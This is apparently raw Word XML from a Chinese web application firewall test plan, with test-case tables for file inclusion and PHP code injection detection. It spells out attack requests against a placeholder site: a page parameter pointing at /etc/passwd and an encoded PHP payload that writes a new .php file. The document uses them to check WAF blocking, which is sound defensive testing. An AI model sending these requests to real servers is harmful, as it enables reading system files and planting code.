              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51785CF4">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1192D968">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc21077795"/>
      <w:bookmarkStart w:id="42" w:name="_Toc81916098"/>
      <w:bookmarkStart w:id="43" w:name="_Toc982450847"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>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19CBBE8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="49AB1950">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="43F6E42F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件包含攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="637E3047">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="24E1B582">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="01FD0A3B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件包含漏洞是一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查，导致用户可以控制被包含的文件，成功利用时可以使w</w:t>
            </w:r>
            <w:r>
              <w:t>eb server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将特定文件当成脚本执行，从而导致用户可获取一定的服务器权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="01841883">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7B0F127F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0C4588E7">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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62A1B5A5">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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将W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C26FD4">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="163" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:jc w:val="left"/>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在客户端构造请求，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ttp://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ww.site.com/index.php?page=/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E48FFA4">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="163" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="693E70F1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43AD1CA7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6330FBF2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1869D54F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1B7FBB53">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E42169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45A723B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2F28F67E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5184FB7E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B0E1B1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DCF4A19">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CDD1069">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CB50DB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc81916099"/>
      <w:bookmarkStart w:id="45" w:name="_Toc21077796"/>
      <w:bookmarkStart w:id="46" w:name="_Toc49623746"/>
      <w:r>
        <w:t>PHP代码注入攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkStart w:id="47" w:name="_deswv2cv69uo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4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176C06A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6DE9AAB0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="38460691">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码注入攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BE96293">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="73C0973E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3E772594">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入是泛指其他种种允许攻击者直接对服务器脚本引擎提供代码的注入攻击。在P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入实例里，服务端脚本引擎是P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，实际上P</w:t>
            </w:r>
            <w:r>
              <w:t>HP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入是“动态赋值安全隐患”、“包含文件注入”等的安全隐患。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7CCE4FBA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43778A01">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5BF611B7">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A129305">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059ECBC3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37FB9A02">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>http://www.site.com/index.php?a=fetch&amp;content=%3C?php+file_put_contents(%2211415.php%22,%22%3C?php+echo+1745189061%3B%22)%3B</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A5011F9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30F38B7A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="11D57D59">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="46366CAA">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79" name="Picture 385164379"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="php_event_5451da52eb0642069df3c9f4665abaf4_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>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80" name="Picture 385164380"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="php_event_5451da52eb0642069df3c9f4665abaf4_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="64D4566F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0A3A995F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051A810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F9CCCD7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4104D450">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7151E1CB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D5015B0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="345D0530">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6B3C1A">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EDB625">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71774B">
      <w:pPr>
